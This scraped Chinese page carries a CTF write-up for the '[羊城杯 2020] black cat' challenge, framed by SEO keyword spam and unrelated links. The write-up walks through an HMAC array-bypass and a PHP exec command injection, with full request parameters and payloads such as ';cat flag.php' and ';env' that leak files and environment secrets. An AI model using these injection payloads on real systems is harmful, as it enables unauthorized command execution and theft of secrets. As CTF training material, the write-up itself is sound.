当前位置: 首页 > news >正文

做外贸需要关注的网站有什么问题备份核验单时网站域名

做外贸需要关注的网站有什么问题,备份核验单时网站域名,西安有哪些好玩的,国外服务器怎么买[羊城杯 2020]black cat 1 解题流程1.1 第一步1.2 第二步1.3 第三步 1 解题流程 1.1 第一步 打开网站有首歌,按F12也是提示听歌,ctf-wscan扫描就flag.php下载歌,用010打开,发现有一段内容if(empty($_POST[Black-Cat-Sheriff]) |…

[羊城杯 2020]black cat

  • 1 解题流程
    • 1.1 第一步
    • 1.2 第二步
    • 1.3 第三步

1

1 解题流程

1.1 第一步

  1. 打开网站有首歌,按F12也是提示听歌,ctf-wscan扫描就flag.php
  2. 下载歌,用010打开,发现有一段内容
    if(empty($_POST['Black-Cat-Sheriff']) || empty($_POST['One-ear'])){die('Ë­£¡¾¹¸Ò²ÈÎÒÒ»Ö»¶úµÄβ°Í£¡');
    }
    $clandestine = getenv("clandestine");		//获取环境变量
    if(isset($_POST['White-cat-monitor']))$clandestine = hash_hmac('sha256', $_POST['White-cat-monitor'], $clandestine);
    $hh = hash_hmac('sha256', $_POST['One-ear'], $clandestine);
    if($hh !== $_POST['Black-Cat-Sheriff']){die('ÓÐÒâÃé×¼£¬ÎÞÒâ»÷·¢£¬ÄãµÄÃÎÏë¾ÍÊÇÄãÒªÃé×¼µÄÄ¿±ê¡£ÏàÐÅ×Ô¼º£¬Äã¾ÍÊÇÄÇ¿ÅÉäÖаÐÐĵÄ×Óµ¯¡£');
    }
    echo exec("nc".$_POST['One-ear']);
    

1.2 第二步

  1. 这题要post这几个参数:Black-Cat-Sheriff、One-ear、White-cat-monitor
    这里有3个if,首先第一个肯定绕过;
          第二个if里面存在hash_hmac函数,只要我们传数组就能让盐是空,即第一次加密的clandestine是空
          第三个因为盐是空所以只有普通加密,Black-Cat-Sheriff传对应加密结果就行
    特性:MD5、sha特性是无法识别数组,只要是数组加密,就会变成null,所以White-cat-monitor采用数组绕过
  2. 最后一个if判断,编写一个脚本,生成加密结果
    <?php$hh = hash_hmac('sha256',';cat flag.php', null);echo $hh;
    ?>
    结果:04b13fc0dff07413856e54695eb6a763878cd1934c503784fe6e24b7e8cdb1b6
    
  3. exec(‘nc’.) 这里拼接命令,如果直接传cat flag.php会变成 => exec('nc’cat flag.php)无法执行
    只要是系统命令的执行,可以通过;来拼接命令,所以one-ear=;cat flag.php => exec('nc';cat flag.php)

1.3 第三步

我先用ls ls …/ ls /等都没结果,考虑其他

  1. ?Black-Cat-Sheriff=83a52f8ff4e399417109312e0539c80147b5514586c45a6caeb3681ad9c1a395&One-ear=;dir&White-cat-monitor[]=1
    得到: Hei_Mao_Jing_Chang.mp3 flag.php index.php js scss
  2. Black-Cat-Sheriff=04b13fc0dff07413856e54695eb6a763878cd1934c503784fe6e24b7e8cdb1b6&One-ear=;cat flag.php&White-cat-monitor[]=1
    得到: “GWHT{y0u_mu3t_p@y_atTentiou_!0_lt}”;
    提交后发现这个flag是错的
  3. 如果cat flag.php没出来,就cat /flag,或者env
    Black-Cat-Sheriff=afd556602cf62addfe4132a81b2d62b9db1b6719f83e16cce13f51960f56791b&One-ear=;env&White-cat-monitor[]=1
    得到:FLAG=flag{e325e53c-76d2-40b8-a41a-4dd88185afdb}
http://www.yayakq.cn/news/18998/

相关文章:

  • 网站注册费用大连网站开发建站
  • dede图片网站模板设计签名免费纯手工签名
  • 番禺做网站技术河北定制网站建设产业
  • 怎么做淘宝返利网站吗企业免费网站优化服务
  • 上海建站网站建设亚马逊中国网站建设目标
  • 做简历最好的网站仿煎蛋 wordpress 主题
  • 在屈臣氏做网站运营wordpress用户站点
  • 西八里庄网站建设网站seo收录工具
  • 网站续费查询昆明seo关键字推广
  • 做的网站底部应该标注什么意思网站建设家乡网页设计模板
  • 辽宁省营商环境建设监督局网站企业管理咨询机构
  • 数据库里建设好的网站为什么外网进不去网站html5技术可以制作网站吗
  • 建网站的费用是多少钱清风算法受影响的网站
  • 网站源码大全最新行业发展趋势
  • dedecms建站教程ui模板免费下载
  • 建站素材增城新闻头条今天
  • pos机网站建设方案长沙seo计费管理
  • 马鞍山做网站的门户网站有哪几个
  • 网站建设 报价单 doc佛山手机网站设计制作
  • 天津和平做网站网页游戏网站知乎
  • 网站模板50元手机软件开发培训班
  • 阿里云腾讯云网站建设外卖平台
  • 可口可乐公司的企业网站建设不要域名能建网站么
  • 温州网站建设 首选国鼎网络好域名解析错误是网络问题还是电脑问题
  • 做拍卖网站多少钱做网站的个人总结
  • 电子商务网站设计原理实践报告wordpress 链接按钮
  • wordpress后台登陆logowordpress伪静态优化
  • 要建设一个网站需要什么仿腾讯网站源码
  • 网站制作流程图制作ppt的软件app
  • 公司网站维护一般需要做什么网站开发如何使用API